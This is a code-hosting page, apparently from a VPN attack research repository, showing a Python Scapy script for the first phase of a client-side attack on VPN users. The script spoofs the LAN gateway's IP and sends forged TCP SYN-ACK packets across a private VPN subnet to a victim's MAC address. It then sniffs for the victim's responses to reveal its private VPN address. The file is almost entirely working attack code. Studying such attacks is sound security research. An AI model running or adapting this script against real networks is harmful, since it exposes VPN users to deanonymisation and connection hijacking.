Breakpointing-Bad-Public
/
vpn-attacks
7
0
Fork 0
Code Issues Pull Requests Releases Wiki Activity
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
9 Commits
1 Branch
0 Tags
530 MiB
 
 
 
 
 
 
Tree: 5882c33314
Branches Tags
${ item.name }
Create tag ${ searchTerm }
Create branch ${ searchTerm }
from '5882c33314'
${ noResults }
vpn-attacks/client-side-attack/first_phase/slow_p1.py

155 lines
3.9 KiB
Raw Blame History

#!/usr/bin/env python3
from scapy.all import *
import ipaddress
from threading import Thread, Event
from time import sleep
import os
#
#
#
#
# Thread classes for sniffing
#
# Sniffer Class all grabbed from https://www.cybrary.it/0p3n/sniffing-inside-thread-scapy-python/
class Sniffer(Thread):
def __init__(self, iface="en0"):
super().__init__()
self.daemon = True
self.vpn_addr = None
self.current_phase = 1
self.spoof_count = 0
self.spoof_port = 0
self.socket = None
self.iface = iface
self.stop_sniffer = Event()
def run(self):
self.socket = conf.L2listen(
type=ETH_P_ALL,
iface=self.iface,
filter="ip"
)
sniff(
opened_socket=self.socket,
prn=self.handle_packet,
)
def join(self, timeout=None):
self.stop_sniffer.set()
super().join(timeout)
def get_vpn_addr(self):
return self.vpn_addr
def set_phase(self, phase):
self.current_phase = phase
def check_for_req(self, packet):
ip_layer = packet.getlayer(IP)
# for phase 1 (on ubuntu 19) we wanna look for a reset
# with source of private vpn address and dest of gateway
if self.current_phase == 1:
if "10." in ip_layer.src:
if ip_layer.src == self.vpn_addr:
print("multiple matches for: " + str(self.vpn_addr))
# could make the scan stop after this point but
# only takes a second or two to finish up
print("Victim private ip is: " + str(ip_layer.src))
self.vpn_addr = ip_layer.src
def handle_packet(self, packet):
#ip_layer = packet.getlayer(IP)
#print("[!] New Packet: {src} -> {dst}".format(src=ip_layer.src, dst=ip_layer.dst))
# if its not an SSH packet then check for challenge acks
#
if TCP in packet:
tcp_sport = packet[TCP].sport
tcp_dport = packet[TCP].dport
if (tcp_sport != 2222 and tcp_dport != 2222) or (tcp_sport != 22 and tcp_dport != 22):
self.check_for_req(packet)
############
def phase_one_spread(gateway_ip, dst_net, iface="en0", edst="08:00:27:5c:c9:d1",
sport=50505, dport=443, flags="SA"):
pieces = gateway_ip.split('.')
src = pieces[0] + '.' + pieces[1] + '.' + pieces[2] + '.1'# should be gateway of LAN
src = gateway_ip
eth = Ether(dst=edst)
tcps = TCP(sport=sport,dport=dport,flags=flags) # src and dst ports don't matter
for ip in ipaddress.IPv4Network(dst_net + '/24'):
print('{} to: {}'.format(flags, str(ip)))
ip_pack = IP(src = src, dst = str(ip))
sendp(eth/ip_pack/tcps, iface=iface, count=2, verbose=0)
print("\nFinished spreading to private address space.")
def main():
if len(sys.argv) < 5:
print("Usage:\n{} {} {} {} {} [{}] [{}]".format(
sys.argv[0], "<GATEWAY_IP>", "<VPN SUBNET>", "<IFACE>", "<VICTIM_MAC>",
"<SPORT>", "<>"))
exit(-1)
gateway_ip = sys.argv[1]
vpn_net = sys.argv[2]
iface = sys.argv[3]
edst = sys.argv[4]
if len(sys.argv) == 6:
sport = int(sys.argv[5])
else:
sport = 50505
if len(sys.argv) == 7:
dport = int(sys.argv[6])
else:
dport = 443
if len(sys.argv) == 8:
flags = sys.argv[7]
else:
flags = "SA"
sniffer = Sniffer(iface=iface)
sniffer.start()
## Phase 1 - spread private address range passed in
#
sleep(.5)
print("Scanning entire dest net " + str(vpn_net))
phase_one_spread(gateway_ip, str(vpn_net),
iface=iface, edst=edst,
sport=sport, dport=dport, flags=flags)
vpn_addr = sniffer.get_vpn_addr()
print('Completed phase one and found client has private VPN address: ' + str(vpn_addr) + '\n\n')
if __name__ == '__main__':
main()